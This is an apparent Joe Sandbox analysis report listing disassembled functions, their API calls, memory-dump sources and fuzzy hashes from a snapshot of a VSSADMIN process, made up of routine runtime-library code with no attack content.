                                                                                                                                                                      control_flow_graph 875 7ff614c8c460-7ff614c8c485 876 7ff614c8c753 875->876 877 7ff614c8c48b-7ff614c8c48e 875->877 880 7ff614c8c755-7ff614c8c765 876->880 878 7ff614c8c490-7ff614c8c4c2 call 7ff614c89d14 877->878 879 7ff614c8c4c7-7ff614c8c4f3 877->879 878->880 882 7ff614c8c4fe-7ff614c8c504 879->882 883 7ff614c8c4f5-7ff614c8c4fc 879->883 885 7ff614c8c514-7ff614c8c529 call 7ff614c92a6c 882->885 886 7ff614c8c506-7ff614c8c50f call 7ff614c8b820 882->886 883->878 883->882 890 7ff614c8c52f-7ff614c8c538 885->890 891 7ff614c8c643-7ff614c8c64c 885->891 886->885 890->891 894 7ff614c8c53e-7ff614c8c542 890->894 892 7ff614c8c64e-7ff614c8c654 891->892 893 7ff614c8c6a0-7ff614c8c6c5 WriteFile 891->893 897 7ff614c8c656-7ff614c8c659 892->897 898 7ff614c8c68c-7ff614c8c69e call 7ff614c8bf18 892->898 895 7ff614c8c6d0 893->895 896 7ff614c8c6c7-7ff614c8c6cd GetLastError 893->896 899 7ff614c8c553-7ff614c8c55e 894->899 900 7ff614c8c544-7ff614c8c54c call 7ff614c83a50 894->900 905 7ff614c8c6d3 895->905 896->895 906 7ff614c8c678-7ff614c8c68a call 7ff614c8c138 897->906 907 7ff614c8c65b-7ff614c8c65e 897->907 919 7ff614c8c630-7ff614c8c637 898->919 902 7ff614c8c56f-7ff614c8c584 GetConsoleMode 899->902 903 7ff614c8c560-7ff614c8c569 899->903 900->899 910 7ff614c8c58a-7ff614c8c590 902->910 911 7ff614c8c63c 902->911 903->891 903->902 913 7ff614c8c6d8 905->913 906->919 914 7ff614c8c6e4-7ff614c8c6ee 907->914 915 7ff614c8c664-7ff614c8c676 call 7ff614c8c01c 907->915 917 7ff614c8c596-7ff614c8c599 910->917 918 7ff614c8c619-7ff614c8c62b call 7ff614c8baa0 910->918 911->891 920 7ff614c8c6dd 913->920 921 7ff614c8c6f0-7ff614c8c6f5 914->921 922 7ff614c8c74c-7ff614c8c751 914->922 915->919 925 7ff614c8c5a4-7ff614c8c5b2 917->925 926 7ff614c8c59b-7ff614c8c59e 917->926 918->919 919->913 920->914 928 7ff614c8c723-7ff614c8c72d 921->928 929 7ff614c8c6f7-7ff614c8c6fa 921->929 922->880 934 7ff614c8c610-7ff614c8c614 925->934 935 7ff614c8c5b4 925->935 926->920 926->925 932 7ff614c8c72f-7ff614c8c732 928->932 933 7ff614c8c734-7ff614c8c743 928->933 930 7ff614c8c713-7ff614c8c71e call 7ff614c84430 929->930 931 7ff614c8c6fc-7ff614c8c70b 929->931 930->928 931->930 932->876 932->933 933->922 934->905 937 7ff614c8c5b8-7ff614c8c5cf call 7ff614c92b38 935->937 941 7ff614c8c5d1-7ff614c8c5dd 937->941 942 7ff614c8c607-7ff614c8c60d GetLastError 937->942 943 7ff614c8c5df-7ff614c8c5f1 call 7ff614c92b38 941->943 944 7ff614c8c5fc-7ff614c8c603 941->944 942->934 943->942 948 7ff614c8c5f3-7ff614c8c5fa 943->948 944->934 945 7ff614c8c605 944->945 945->937 948->944
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF614C8C44B), ref: 00007FF614C8C57C
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF614C8C44B), ref: 00007FF614C8C607
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConsoleErrorLastMode
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 953036326-0
                                                                                                                                                                      • Opcode ID: 5c9562be74e3e011b14f36cc2d5f23b575e471fae160cb885922e2a719cf7448
                                                                                                                                                                      • Instruction ID: 8ec18fb021b556b2e0f1d3e6acc8e776c965f3dcf430bb9058c7f304fe65182d
                                                                                                                                                                      • Opcode Fuzzy Hash: 5c9562be74e3e011b14f36cc2d5f23b575e471fae160cb885922e2a719cf7448
                                                                                                                                                                      • Instruction Fuzzy Hash: D991CF32A18E5395F7608F6594C42BD2BB0BB46FA8F54513BDE0EA3A95DF38D482D700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8E90C Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _get_daylight$_isindst
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4170891091-0
                                                                                                                                                                      • Opcode ID: 8bf97934fac92d6cf6f5aeec7a7ab7ef5245e80df15cb27ed03d14056eff3848
                                                                                                                                                                      • Instruction ID: 18f7f7ec65ed05b9de3eaf02fb1f48b45cf8e88610e79f34814b461ec7ee7253
                                                                                                                                                                      • Opcode Fuzzy Hash: 8bf97934fac92d6cf6f5aeec7a7ab7ef5245e80df15cb27ed03d14056eff3848
                                                                                                                                                                      • Instruction Fuzzy Hash: 2E51D672F049228AEB14DB64D9C56BC27B1BB56B78F504136DE1ED3AE5DF38A402CB00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C7B1CC Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1452418845-0
                                                                                                                                                                      • Opcode ID: 43fd9ef1ec5574f9622d8b8e8f0d0ca9553bbdc8c9993cf27e28b57b512a640d
                                                                                                                                                                      • Instruction ID: 1a9aaf4158639f587fd48fa07908b1b63d74956d7f4ae854f33bcb677f76da95
                                                                                                                                                                      • Opcode Fuzzy Hash: 43fd9ef1ec5574f9622d8b8e8f0d0ca9553bbdc8c9993cf27e28b57b512a640d
                                                                                                                                                                      • Instruction Fuzzy Hash: F5317820E0DD4342FA14AB64E4D13BA22B1AF93FAEF405037DB0DC76E3EE2DA4448251
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C846B0 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279662727-0
                                                                                                                                                                      • Opcode ID: 90acb52a2f85a750f88b8c0786b469e374ae1bde126679d263a64c2465fb0c5e
                                                                                                                                                                      • Instruction ID: 6e746ff8c10a07264a1b2750a7be2a62dccb794005f63ddfb84f973f81dd184b
                                                                                                                                                                      • Opcode Fuzzy Hash: 90acb52a2f85a750f88b8c0786b469e374ae1bde126679d263a64c2465fb0c5e
                                                                                                                                                                      • Instruction Fuzzy Hash: E2417262D18B8283F7548B61D590379B270FB96B74F10933AE69C83AD1EF7CA5A09704
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C888B8 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                      • Opcode ID: c535fe1fb7e6e6615454c236fb49958ba2bf46abcf1afe76e887743b7fa28a67
                                                                                                                                                                      • Instruction ID: d10d9bc1b8a75e8ebe7ff1e67e24daa55a29c9097a653680f72ccc03f642dc00
                                                                                                                                                                      • Opcode Fuzzy Hash: c535fe1fb7e6e6615454c236fb49958ba2bf46abcf1afe76e887743b7fa28a67
                                                                                                                                                                      • Instruction Fuzzy Hash: 86D09218F18F4796EE182B75B8D517A12726F4AFA5F10183AC84B87793CE2FA8495221
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C7F3CC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: e6b31fcbb010569d964db91d6e465c54053a5eb593f9b70391a20bf1ad845ba7
                                                                                                                                                                      • Instruction ID: d63eb1cfdc3b1a358e1555099081bbf8e1bf2162cb84e394e83cfe1a099c9834
                                                                                                                                                                      • Opcode Fuzzy Hash: e6b31fcbb010569d964db91d6e465c54053a5eb593f9b70391a20bf1ad845ba7
                                                                                                                                                                      • Instruction Fuzzy Hash: CB511561B0DA8347EA68DE2594E067A62A0BF46FB5F144732DE6CC37D5CF3CD4018600
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C7B0E0 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3548387204-0
                                                                                                                                                                      • Opcode ID: 6f4d91f14022360dab0355fac000d53ce384dee1e6364c71d03b9cb5aa4004ae
                                                                                                                                                                      • Instruction ID: 7dac8cf696f043d08095e1d376b5c02c65d0c39e38cb242a4132a6de8e27f6f2
                                                                                                                                                                      • Opcode Fuzzy Hash: 6f4d91f14022360dab0355fac000d53ce384dee1e6364c71d03b9cb5aa4004ae
                                                                                                                                                                      • Instruction Fuzzy Hash: AA119D44E0CA4343FA5877B588C62FA01B05FA3B7AF840436EB0EC71D3ED5DB8404262
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8A058 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF614C89ED5,?,?,00000000,00007FF614C89F8A), ref: 00007FF614C8A0C6
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF614C89ED5,?,?,00000000,00007FF614C89F8A), ref: 00007FF614C8A0D0
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ChangeCloseErrorFindLastNotification
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1687624791-0
                                                                                                                                                                      • Opcode ID: 92f4f4d1d4744ab8e3e5075f9c3f1c4e1aa1a51ff1876d4144c1ee488cb6abae
                                                                                                                                                                      • Instruction ID: 1cbc991455a442d19bc62fd000a59500d9951bf783d4da7aa4dbcd4893adfa7f
                                                                                                                                                                      • Opcode Fuzzy Hash: 92f4f4d1d4744ab8e3e5075f9c3f1c4e1aa1a51ff1876d4144c1ee488cb6abae
                                                                                                                                                                      • Instruction Fuzzy Hash: A421A421F18E4341FA505769A4D037D25A19F86FB4F04523BDA2EC73D6CF6EE445A301
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8B634 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointerEx.KERNELBASE(?,?,?,?,00000000,00007FF614C8B7CD), ref: 00007FF614C8B680
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,00000000,00007FF614C8B7CD), ref: 00007FF614C8B68A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2976181284-0
                                                                                                                                                                      • Opcode ID: c2ae5bf7dfd723bcaf49b473343ea681dff7813d4b8ca545b941fb3c7d872366
                                                                                                                                                                      • Instruction ID: 0cbb14d3c37acebcc0054627e3272f1c9e17f948f01dec6ec1feade9a862164d
                                                                                                                                                                      • Opcode Fuzzy Hash: c2ae5bf7dfd723bcaf49b473343ea681dff7813d4b8ca545b941fb3c7d872366
                                                                                                                                                                      • Instruction Fuzzy Hash: E211C161B18E8281DA208B25E884169B371BB86FF4F544336EE7D8B7E9DF3CE0148700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C869B4 Relevance: 3.0, APIs: 2, Instructions: 35timeCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF614C86831), ref: 00007FF614C869D7
                                                                                                                                                                      • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF614C86831), ref: 00007FF614C869ED
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1707611234-0
                                                                                                                                                                      • Opcode ID: bf2dc69d1c671b65f6fe74b61b09bd13a14de0638ac0b577694877a04e2cb74c
                                                                                                                                                                      • Instruction ID: 26f789cead0624a97e08d5b75c98d14bd99aa0a56921d839e71615d07107ef4b
                                                                                                                                                                      • Opcode Fuzzy Hash: bf2dc69d1c671b65f6fe74b61b09bd13a14de0638ac0b577694877a04e2cb74c
                                                                                                                                                                      • Instruction Fuzzy Hash: 87015E7261CA5282E7545F14E48127AB7B1FB82B75F604237E6AD825D4DF7ED050DB00
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C89E48 Relevance: 3.0, APIs: 2, Instructions: 19COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlReleasePrivilege.NTDLL(?,?,?,00007FF614C91E72,?,?,?,00007FF614C91EAF,?,?,00000000,00007FF614C92375,?,?,?,00007FF614C922A7), ref: 00007FF614C89E5E
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF614C91E72,?,?,?,00007FF614C91EAF,?,?,00000000,00007FF614C92375,?,?,?,00007FF614C922A7), ref: 00007FF614C89E68
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLastPrivilegeRelease
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1334314998-0
                                                                                                                                                                      • Opcode ID: 90a3e1b0ca63f129125972b75d02b7296718c6d583bf4673ea5362494b00de43
                                                                                                                                                                      • Instruction ID: f2fe67c0897fc9482d6441b18da886230114c02c67fad160bd95c4e5623bad8f
                                                                                                                                                                      • Opcode Fuzzy Hash: 90a3e1b0ca63f129125972b75d02b7296718c6d583bf4673ea5362494b00de43
                                                                                                                                                                      • Instruction Fuzzy Hash: 92E08650F08E4353FF189BF194C417512705F87F60B44503AC80EC3251EE2CA9459200
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8671C Relevance: 3.0, APIs: 2, Instructions: 12COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DirectoryErrorLastRemove
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 377330604-0
                                                                                                                                                                      • Opcode ID: f413b4ddc67d8632ac5557a0a97acca73a4185b66c4a9911fb05703a719da85e
                                                                                                                                                                      • Instruction ID: fd31f18b22c4eb6ae250733453a6587bfc4b5050ecef8b03c2ffe3a81b0c74f3
                                                                                                                                                                      • Opcode Fuzzy Hash: f413b4ddc67d8632ac5557a0a97acca73a4185b66c4a9911fb05703a719da85e
                                                                                                                                                                      • Instruction Fuzzy Hash: E8D01214F2DE4391EA1827755CC533921B03F46F34FD00637C01EC31D1EE1EA0956101
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C86FA0 Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
